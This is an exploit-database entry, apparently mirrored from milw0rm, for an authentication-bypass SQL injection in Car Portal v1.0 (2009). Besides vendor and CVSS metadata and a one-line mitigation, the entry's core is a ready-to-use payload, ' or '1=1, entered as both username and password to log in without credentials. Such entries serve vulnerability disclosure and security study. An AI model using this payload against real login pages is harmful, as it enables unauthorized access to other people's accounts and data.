header-logo
Suggest Exploit
vendor:
Car Portal
by:
xoron
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Car Portal
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:xoron:car_portal:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Car Portal v1.0 (Bypass) Remote SQL Injection Vuln.

Car Portal v1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can bypass the authentication process by entering ' or '1=1 as the username and password.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
=                                 XORON 2009(C)
=
=              Car Portal v1.0 (Bypass) Remote SQL Injection Vuln.      
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script:   CAR PORTAL, version 1.0
=
= Author: xoron
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Exploit:   
=
=                       //Username:  ' or '1=1
=                        //Password:  ' or '1=1
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2009-01-29]

Navigation

Suggest Exploit

Services By CQR